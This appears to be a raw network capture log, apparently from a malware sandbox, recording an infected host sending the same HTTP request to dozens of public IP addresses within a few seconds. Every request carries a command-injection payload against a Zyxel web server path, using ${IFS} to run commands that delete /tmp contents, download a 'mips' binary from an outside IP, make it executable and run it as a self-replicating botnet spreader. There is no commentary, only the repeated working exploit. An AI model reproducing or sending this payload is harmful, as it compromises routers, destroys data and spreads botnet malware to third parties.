                                        Mar 31, 2024 09:21:04.684288025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3670192.168.2.23545064.194.178.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684318066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3671192.168.2.2354192209.44.160.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684387922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3672192.168.2.233917085.127.53.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684427977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3673192.168.2.2360792138.122.110.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684499025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3674192.168.2.234328080.77.108.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684539080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3675192.168.2.235683472.88.113.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684617043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3676192.168.2.2354086211.174.33.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684676886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3677192.168.2.2358506208.147.193.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684722900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3678192.168.2.233546852.16.36.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684767008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3679192.168.2.234967464.58.175.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684803963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3680192.168.2.234084478.71.141.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684853077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3681192.168.2.2353996113.211.170.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684914112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3682192.168.2.2360352209.43.229.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.684959888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3683192.168.2.235658627.34.58.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685012102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3684192.168.2.2359370135.56.86.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685061932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3685192.168.2.2350788167.236.23.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685146093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3686192.168.2.2356456186.46.158.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685190916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3687192.168.2.2348876139.223.128.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685225964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3688192.168.2.233575042.230.148.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685283899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3689192.168.2.2353682211.92.97.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685318947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3690192.168.2.235730423.144.137.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685369968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3691192.168.2.2356058172.170.227.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685401917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3692192.168.2.2357538217.175.45.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685472012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3693192.168.2.235805870.136.74.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685522079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3694192.168.2.2339548100.2.200.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685594082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3695192.168.2.2338168161.16.194.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685640097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3696192.168.2.233866847.244.59.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685688972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3697192.168.2.233739280.62.27.4443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685739040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3698192.168.2.233925654.111.15.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685789108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3699192.168.2.233858680.156.163.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685868025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3700192.168.2.2337002163.187.197.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685925961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3701192.168.2.2334962198.176.61.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.685966969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3702192.168.2.235175827.71.46.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686019897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3703192.168.2.2342856169.190.80.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686075926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3704192.168.2.233408831.163.173.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686151028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3705192.168.2.234503671.187.28.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686224937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3706192.168.2.233760096.65.177.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686265945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3707192.168.2.235888272.37.18.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686321974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3708192.168.2.2356756105.229.196.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686367035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3709192.168.2.2342490216.105.109.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686453104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3710192.168.2.2336708174.81.22.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686501980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3711192.168.2.2357896108.80.48.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686563015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3712192.168.2.2360634159.205.110.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686613083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3713192.168.2.2334852146.92.244.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686661959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3714192.168.2.236065295.213.177.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686728001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3715192.168.2.2355268184.192.76.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686760902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3716192.168.2.2350420154.7.171.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686825037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3717192.168.2.2340736196.148.183.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686875105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3718192.168.2.2342872134.91.139.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.686939001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3719192.168.2.23435021.47.206.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.687009096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3720192.168.2.2358370168.35.145.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.687047958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3721192.168.2.233842844.25.71.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.687113047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3722192.168.2.235640269.222.107.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.687145948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3723192.168.2.234989851.81.97.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.694487095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3724192.168.2.2352832142.241.78.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.694523096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3725192.168.2.2341906194.41.12.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.694578886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3726192.168.2.234472665.216.229.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.694627047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3727192.168.2.234546453.33.22.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.694678068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3728192.168.2.23539122.198.201.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.694762945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3729192.168.2.235085842.114.163.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.694829941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3730192.168.2.235569859.53.171.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.694884062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3731192.168.2.2349584219.6.125.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:04.694958925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3732192.168.2.2338600188.44.134.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:05.689717054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3733192.168.2.2357272193.12.241.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:05.689758062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3734192.168.2.233587041.183.146.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:05.689824104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3735192.168.2.2350438115.106.134.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:05.689855099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3736192.168.2.235776636.69.232.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:05.690053940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3737192.168.2.2341936126.108.248.86443
                                        TimestampBytes transferredDirectionData
